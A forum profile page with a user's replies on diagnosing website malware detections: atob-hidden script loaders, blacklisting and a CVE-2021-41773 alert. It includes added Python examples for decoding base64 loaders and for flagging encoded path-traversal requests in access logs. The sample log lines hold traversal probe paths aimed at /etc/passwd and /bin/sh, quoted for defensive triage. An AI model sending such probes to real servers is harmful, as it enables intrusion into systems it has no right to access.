Profile: Nevermind
Posts: 29
Days Won: 1
Nevermind last won the day on July 22 2022
Nevermind had the most liked content!
About Nevermind
Rank: Newbie
Profile Information
Location: Austria
On an unrelated note - you allow your (company) users to install any unverified browser extension. Be it a simple game, pseudo-useful tool, credentials harvesting ext. or a straight malware. Google store is far from a trustworthy source. If I were you I would block this possibility for all company PCs. Especially knowing there is CN "neighbor" nearby.
Assistance with detecting JS/Spy.Banker.KY on website
Nevermind replied to AnthonyIT's topic in Malware Finding and Cleaning
It will.
Assistance with detecting JS/Spy.Banker.KY on website
Nevermind replied to AnthonyIT's topic in Malware Finding and Cleaning
Main page ilsau[.]com.au has this in it: <_script type='text/javascript' src='hxxps://ilsau[.]com.au/wp-content/themes/ils2020/assets/js/app.js?ver=2.1.0' id='il2020-app-js-js'></script> The loaded app.js contains a line with the 'atob' function that loads another, unwanted JS from a remote server. That's all we can see from the visitor's point of view. Until you (or a specialized company) clean the server, the detection will always trigger.
Help to find locate JS.Banker.IV
Nevermind replied to Karl P's topic in Malware Finding and Cleaning
Because you do not have control over the logic of who gets the infected content and who does not. The attacker has. And often, if the (malicious) script finds out you are logged into WordPress as admin, you get to see only the clean version. But there are more tactics, like how many times you visited the page, how much time elapsed since your previous visit, whether your IP is on some kind of blacklist, etc.
Help to find locate JS.Banker.IV
Nevermind replied to Karl P's topic in Malware Finding and Cleaning
Well, you can start with telling us what the detected URL is.
JS/ScrInject.B False positive?
Nevermind replied to eclipse79's topic in Malware Finding and Cleaning
The malicious file is gone, but it's a half solution since the file is still being referenced by all of the websites on that domain. Lucky for you, it is enough to avoid detection.
Security vulnerability exploitation attempt
Nevermind replied to Lokajlok's topic in Vírusy a iné hrozby
A script that tries all the IPs on some subnet one after another and waits to see which IP "bites". E.g.
I did something stupid, need advice
Nevermind replied to Tom25's topic in Malware Finding and Cleaning
The only reputable AV detecting this is Sophos, and even it says it's just PUA. You probably cannot see it since you do not have a VT account, but this file was first scanned in 2020 and has been submitted to VT over 200 times since then. Stay calm.
Look for 'Ly9yZWd0ZWNoLnNicw' in the source code of main page. You will find malicious part.
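The two posts above (the app.js that hides a remote script URL behind 'atob', and the advice to grep the main page for a known base64 fragment) describe the same triage step: find base64 literals handed to atob(), decode them, and see whether they turn into URLs. The following is an added example of that check, not code from either post or from ESET; the page source and the base64 string in it are constructed for illustration, and the decoded URL points at a reserved .invalid name rather than any real host.

```python
import base64
import binascii
import re

# Constructed sample page source, not the real site referenced in the post.
# The inline script decodes a base64 string and uses it as a script src,
# which is why a plain grep for "http" in the HTML would miss the loader.
SAMPLE_HTML = """<html><head>
<script type='text/javascript' src='/wp-content/themes/example/assets/js/app.js?ver=2.1.0'></script>
<script>
var s=document.createElement('script');
s.src=atob('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvbG9hZGVyLmpz');
document.head.appendChild(s);
</script>
</head><body>hello</body></html>"""

# atob('...') or atob("...") with a literal base64 argument
ATOB_RE = re.compile(r"""atob\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)""")
# absolute or protocol-relative URL at the start of the decoded text
URL_RE = re.compile(r'^(?:https?:)?//[^\s\'"]+')


def decode_atob_literals(source):
    """Return (encoded, decoded) pairs for every atob() literal that decodes to text."""
    results = []
    for m in ATOB_RE.finditer(source):
        enc = m.group(2)
        # Pad to a multiple of 4 so fragments written without '=' still decode.
        padded = enc + '=' * (-len(enc) % 4)
        try:
            dec = base64.b64decode(padded, validate=True).decode('utf-8')
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64 or not text: skip, nothing to report
        results.append((enc, dec))
    return results


def find_remote_loaders(source):
    """Decoded atob() strings that look like URLs, i.e. script sources hidden from a plain grep."""
    return [dec for _, dec in decode_atob_literals(source) if URL_RE.match(dec)]


def marker_context(source, marker, width=40):
    """Plain substring search for a known base64 fragment (the grep the post suggests).

    Returns the surrounding text so the analyst can see which script it belongs to,
    or None when the marker is absent."""
    pos = source.find(marker)
    if pos < 0:
        return None
    return source[max(0, pos - width):pos + len(marker) + width]


if __name__ == '__main__':
    for enc, dec in decode_atob_literals(SAMPLE_HTML):
        print(f'atob({enc!r}) -> {dec!r}')
    print('remote loaders:', find_remote_loaders(SAMPLE_HTML))
    print(marker_context(SAMPLE_HTML, 'Ly9leGFtcGxlLmludmFsaWQ'))
```

Run it against a saved copy of the page and of each referenced .js file; a decoded value that is a URL to a domain you do not own is the line to hand to whoever cleans the server. Searching for a base64 marker works only as long as the attacker keeps the same encoding, so the decode step is the more durable of the two checks.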
Website blacklist removal
Nevermind replied to Prahallad Das's topic in Malware Finding and Cleaning
There was malware nearly 2 months ago. The server has either been cleaned or the malware guys took a break. Either way, no reason to block it, for now.
Website blacklisted by Eset
Nevermind replied to Prahallad Das's topic in Malware Finding and Cleaning
There is nothing on that domain except for an empty WordPress project. Yet it has already been hacked. How do you do that? Your main domain has been unblocked. For now. If there are more phishy subdomains later on, it will be blocked again.
HTTP/Exploit.CVE-2021-41773 on a Apache Tomcat server
Nevermind replied to Markwd's topic in Malware Finding and Cleaning
Hey Markwd, that's a network detection only (i.e. it's neither a file nor a memory detection). The way I see it, someone is trying whether your server is vulnerable to this exploit. If you have logging enabled you can check if there are any requests similar to this: hxxp://<your_server>/cgi-bin/.%2e/%2e%2e/%2e%2e.... (src: https://github.com/thehackersbrain/CVE-2021-41773/blob/main/exploit.py) ESET doesn't check whether you are actually running vulnerable software or not. It sees an exploit attempt -> it displays a detection window.
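The log check suggested in the reply above can be scripted. This is an added example, not code from the post or from ESET: it parses Apache combined-format access log lines (constructed samples, with documentation-range IPs) and flags requests whose path contains a percent-encoded dot segment of the kind shown in the reply (.%2e/%2e%2e/...), including double-encoded %252e variants. The status code is kept in the output because it is what separates a refused probe from a request the server actually served.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in Apache "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2021:12:00:02 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 403 199 "-" "curl/7.68.0"
198.51.100.9 - - [10/Oct/2021:12:00:03 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 500 0 "-" "python-requests/2.25"
203.0.113.5 - - [10/Oct/2021:12:00:04 +0000] "GET /images/logo.png HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""

# client ip, identd, user, [timestamp], "METHOD path protocol", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def has_encoded_traversal(raw_path):
    """True when the raw request path hides a '..' segment behind percent-encoding.

    A literal '../' is normalised by browsers and rejected by the server long before
    any file lookup; the probe pattern in the reply relies on %2e to get past that,
    so only paths that carry an encoded dot are flagged here."""
    lowered = raw_path.lower()
    if '%2e' not in lowered and '%252e' not in lowered:
        return False
    decoded = unquote(unquote(lowered))  # second pass catches double encoding
    return any(seg == '..' for seg in decoded.split('/'))


def find_traversal_attempts(log_text):
    """Parse log lines and return the requests that match the encoded-traversal pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # blank or non-combined-format line; skip rather than guess
        if has_encoded_traversal(m.group('path')):
            hits.append({
                'ip': m.group('ip'),
                'ts': m.group('ts'),
                'method': m.group('method'),
                'path': m.group('path'),
                'status': int(m.group('status')),
            })
    return hits


if __name__ == '__main__':
    for h in find_traversal_attempts(SAMPLE_LOG):
        served = 'SERVED' if 200 <= h['status'] < 300 else 'refused'
        print(f"{h['ts']} {h['ip']} {h['method']} {h['path']} -> {h['status']} ({served})")
```

Feed it your real access log instead of SAMPLE_LOG. Lines that come back with 403 or 404 are probes the server turned away and mostly tell you who is scanning; a 2xx on such a path is the one to investigate, since it means the server returned something for a traversal request.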